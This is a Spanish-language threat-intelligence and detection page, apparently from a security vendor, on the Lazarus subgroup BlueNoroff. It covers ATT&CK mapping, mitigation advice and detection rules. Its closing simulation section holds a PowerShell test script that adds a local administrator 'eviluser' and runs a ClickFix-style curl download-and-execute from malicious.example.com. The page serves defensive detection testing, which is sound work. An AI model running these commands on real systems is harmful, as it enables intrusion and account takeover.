Seguir
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
BlueNoroff es un subgrupo financieramente motivado dentro del ecosistema de Lazarus que se centra en operaciones de robo de alto valor contra bancos, empresas de criptomonedas y objetivos más amplios de Web3. El manual del grupo abarca fraudes habilitados por SWIFT, compromisos de watering hole, envenenamiento de la cadena de suministro de paquetes Go y caminos de intrusión en macOS construidos alrededor de cebos de «entrevistas de trabajo» falsos. Para lograr ejecución y persistencia, BlueNoroff mezcla una pila de malware modular en Rust/Go con AppleScript, VBScript y flujos de trabajo de ingeniería social diseñados para eludir la precaución del usuario e integrarse en actividades legítimas de desarrollo y administración.
Investigación
El informe rastrea la trayectoria de BlueNoroff desde el atraco al Banco de Bangladesh en 2016 hasta las más recientes actividades de la era 2025 en la cadena de suministro, destacando cómo las herramientas y objetivos del actor se han expandido junto con el ecosistema cripto/Web3. Los investigadores describen patrones de infraestructura y catalogan componentes de malware que incluyen GhostCall, GhostHire, RustBucket y GillyInjector. La investigación también mapea comportamientos observados en MITRE ATT&CK a través de etapas como reconocimiento y acceso inicial, luego ejecución, persistencia y robo de credenciales, subrayando un énfasis constante en establecer puntos de apoyo sigilosos, la entrega escalonada de cargas útiles y rutas de acceso preparadas para el robo.
Mitigación
Reduzca la exposición al mejorar la higiene de la cadena de suministro: valide los paquetes extraídos de registros públicos, refuerce el control de encapsulamiento y procedencia, y revise continuamente las actualizaciones de dependencias para cambios inesperados en el mantenedor o el código. En macOS, fortalezca la gestión de LaunchAgent/LaunchDaemon y monitorice entradas de persistencia sospechosas y herramientas no firmadas. Bloquee dominios que se asemejan a los utilizados para el envío de cebos, refuerce la MFA para identidades privilegiadas y servicios expuestos externamente, y operacionalice detecciones para scripts maliciosos conocidos, cargadores y técnicas de empaquetado asociadas con el actor. Mantenga actualizaciones frecuentes de inteligencia de amenazas y refuerce la capacitación de los usuarios enfocada en spear-phishing y patrones de ingeniería social de «reclutador/entrevista de trabajo».
Respuesta
Si se descubren indicadores de BlueNoroff, aísle los hosts afectados y conserve las pruebas clave, incluidas líneas de comando completas, contenido de scripts y binarios o artefactos de paquetes descargados. Bloquee los dominios maliciosos identificados y las IPs de C2, luego ejecute los playbooks de respuesta a incidentes alineados con el robo de credenciales y escenarios de compromiso de la cadena de suministro. Despliegue o ajuste detecciones para cadenas de ejecución AppleScript y VBScript, y para patrones sospechosos de PowerShell mencionados en el informe, luego amplíe la búsqueda para identificar endpoints adicionales expuestos al mismo señuelo, dependencia o superposición de infraestructura.
«graph TB %% Class Definitions classDef technique fill:#99ccff classDef action fill:#ffdd99 classDef operator fill:#ff9900 %% Technique Nodes gather_identity[«<b>Técnica</b> – <b>T1589 Recolección de Información de Identidad de la Víctima</b><br/>Recoge información personal, profesional y en línea sobre el objetivo.»] class gather_identity technique search_social[«<b>Técnica</b> – <b>T1593.001 Búsqueda en Redes Sociales</b><br/>Consulta cuentas de redes sociales propiedad de la víctima para localizar datos útiles.»] class search_social technique phish_info[«<b>Técnica</b> – <b>T1598.001 Phishing para Información</b><br/>Elabora mensajes para engañar a las víctimas y obtener credenciales u otros datos.»] class phish_info technique spearphish_service[«<b>Técnica</b> – <b>T1566.003 Spearphishing a través de Servicio</b><br/>Utiliza un servicio en línea legítimo para entregar contenido malicioso a la víctima.»] class spearphish_service technique launch_agent[«<b>Técnica</b> – <b>T1543.001 Lanzamiento de Agente</b><br/>Instala un agente de lanzamiento de macOS para lograr persistencia.»] class launch_agent technique launch_daemon[«<b>Técnica</b> – <b>T1543.004 Lanzamiento de Demonio</b><br/>Instala un demonio de lanzamiento de macOS para lograr persistencia.»] class launch_daemon technique tcc_manip[«<b>Técnica</b> – <b>T1548.006 Manipulación de TCC</b><br/>Modifica la configuración de Transparencia, Consentimiento y Control para obtener mayores privilegios.»] class tcc_manip technique software_packing[«<b>Técnica</b> – <b>T1027.002 Empaquetado de Software</b><br/>Comprime o encripta la carga útil para evadir el análisis.»] class software_packing technique masquerading[«<b>Técnica</b> – <b>T1036.005 Suplantación de Identidad</b><br/>Renombra archivos o utiliza iconos familiares para parecer legítimo.»] class masquerading technique gui_input[«<b>Técnica</b> – <b>T1056.002 Captura de Entrada GUI</b><br/>Graba pulsaciones de teclado o entradas de mouse desde interfaces gráficas para robar credenciales.»] class gui_input technique system_info[«<b>Técnica</b> – <b>T1082 Descubrimiento de Información del Sistema</b><br/>Recoge la versión del sistema operativo, detalles de hardware y software instalado.»] class system_info technique data_local[«<b>Técnica</b> – <b>T1005 Datos del Sistema Local</b><br/>Copia archivos de interés del host infectado.»] class data_local technique local_staging[«<b>Técnica</b> – <b>T1074.001 Preparación de Datos Locales</b><br/>Coloca datos recopilados en un directorio para su exfiltración posterior.»] class local_staging technique web_protocols[«<b>Técnica</b> – <b>T1071.001 Protocolos Web</b><br/>Utiliza HTTP/HTTPS para el tráfico de comando y control.»] class web_protocols technique dead_drop[«<b>Técnica</b> – <b>T1102.001 Resolver de Dead Drop</b><br/>Recupera instrucciones desde una ubicación públicamente alojada.»] class dead_drop technique bidirectional[«<b>Técnica</b> – <b>T1102.002 C2 Bidireccional</b><br/>Permite comunicación bidireccional entre atacante y malware.»] class bidirectional technique oneway[«<b>Técnica</b> – <b>T1102.003 C2 Unidireccional</b><br/>Solo recibe comandos del atacante sin enviar datos de vuelta.»] class oneway technique %% Action Nodes user_click[«<b>Acción</b> – El usuario hace clic en un enlace malicioso y descarga la carga útil»] class user_click action %% Operator Node (optional AND for persistence options) op_persistence((«AND»)) class op_persistence operator %% Connections gather_identity u002du002d>|conduce a| search_social search_social u002du002d>|conduce a| phish_info phish_info u002du002d>|conduce a| spearphish_service spearphish_service u002du002d>|desencadena| user_click user_click u002du002d>|establece| op_persistence op_persistence u002du002d>|utiliza| launch_agent op_persistence u002du002d>|utiliza| launch_daemon launch_agent u002du002d>|habilita| tcc_manip launch_daemon u002du002d>|habilita| tcc_manip tcc_manip u002du002d>|habilita| software_packing tcc_manip u002du002d>|habilita| masquerading software_packing u002du002d>|facilita| gui_input masquerading u002du002d>|facilita| gui_input gui_input u002du002d>|proporciona| system_info system_info u002du002d>|soporta| data_local data_local u002du002d>|prepara| local_staging local_staging u002du002d>|exfiltra vía| web_protocols web_protocols u002du002d>|soporta| dead_drop dead_drop u002du002d>|soporta| bidirectional bidirectional u002du002d>|soporta| oneway «
Flujo de Ataque
Detecciones
Posible Descubrimiento de Configuración de Red del Sistema (mediante cmdline)
Ver
Posible Descubrimiento de Sistema Remoto o Verificación de Conectividad (mediante cmdline)
Ver
Binario/Scripts Sospechosos en Ubicación de Autoinicio (mediante file_event)
Ver
Posible Enumeración de Cuentas de Administrador o Grupo (mediante cmdline)
Ver
IOCs (Emails) para detectar: BlueNoroff Group: El Brazo Financiero del Cibercrimen de Lazarus
Ver
Detección de AppleScript Malicioso y Ejecución de Comando ClickFix [Windows Process Creation]
Ver
Enumeración de Usuarios Locales y de Dominio a través de Comandos de Net [Windows Sysmon]
Ver
Detección de Ofuscación y Codificación de BlueNoroff PowerShell [Windows PowerShell]
Ver
Ejecución de Simulación
Requisito Previo: La Verificación de Telemetría y Línea Base de Pre-Vuelo debe haber sido aprobada.
Razonamiento: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y pretender generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados conducirán a un diagnóstico erróneo.
-
Narrativa de Ataque y Comandos:
- Ejecución de AppleScript (T1546.016) – El adversario deja caer un
payload.scptmalicioso en el endpoint (por ejemplo, a través de un adjunto de phishing). Usando unosascript.exepreinstalado (incluido con una herramienta de terceros), lanzan el script para ejecutar una carga útil de PowerShell que agrega una nueva cuenta de administrador local. - Entrega de Clipboard ClickFix (T1204.004) – El atacante copia un comando preparado al portapapeles que invoca
curlcon un usuario-agente estilo Zoom para descargar una carga útil de segunda etapa, luego inmediatamente la ejecuta a través decmd.exe. El comando también incluye una llamada en línea apowershell.exe -cpara ejecutar la carga útil en memoria.
- Ejecución de AppleScript (T1546.016) – El adversario deja caer un
-
Script de Prueba de Regresión: El script a continuación reproduce ambos comportamientos de una manera determinista.
#----- BEGIN REGRESSION TEST SCRIPT ----- # Asegúrese de que estamos corriendo con privilegios administrativos if (-not ([Security.Principal.WindowsPrincipal] ` [Security.Principal.WindowsBuiltInRole] "Administrator")) { Write-Error "Run this script as Administrator." exit 1 } # 1. Ejecución de AppleScript vía osascript.exe $appleScriptPath = "$env:TEMPmalicious.scpt" Set-Content -Path $appleScriptPath -Value @" tell application "System Events" do shell script "powershell -c `"Add-LocalGroupMember -Group 'Administrators' -Member 'eviluser'`"" end tell "@ # Ejecute el AppleScript Start-Process -FilePath "osascript.exe" -ArgumentList "`"$appleScriptPath`"" -NoNewWindow -Wait # 2. Entrega estilo ClickFix del portapapeles $clickFixCmd = 'curl -A "ZoomSDK" http://malicious.example.com/payload.exe -o $env:TEMPpayload.exe && powershell.exe -c "Start-Process $env:TEMPpayload.exe"' # Ejecute vía cmd.exe para coincidir con la condición de regla Start-Process -FilePath "cmd.exe" -ArgumentList "/c `$clickFixCmd" -NoNewWindow -Wait # Limpieza: eliminar artefactos Remove-Item -Path $appleScriptPath -Force Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue # Fin del script #----- END REGRESSION TEST SCRIPT ----- -
Comandos de Limpieza: Elimine cualquier proceso, archivo y cuenta de usuario de prueba restantes.
# Detener cualquier proceso restante (defensivo - normalmente no es necesario) Get-Process -Name "osascript","cmd","powershell","payload" -ErrorAction SilentlyContinue | Stop-Process -Force # Eliminar archivos temporales Remove-Item -Path "$env:TEMPmalicious.scpt" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue # Eliminar la cuenta administradora de prueba si fue creada if (Get-LocalUser -Name "eviluser" -ErrorAction SilentlyContinue) { Remove-LocalUser -Name "eviluser" }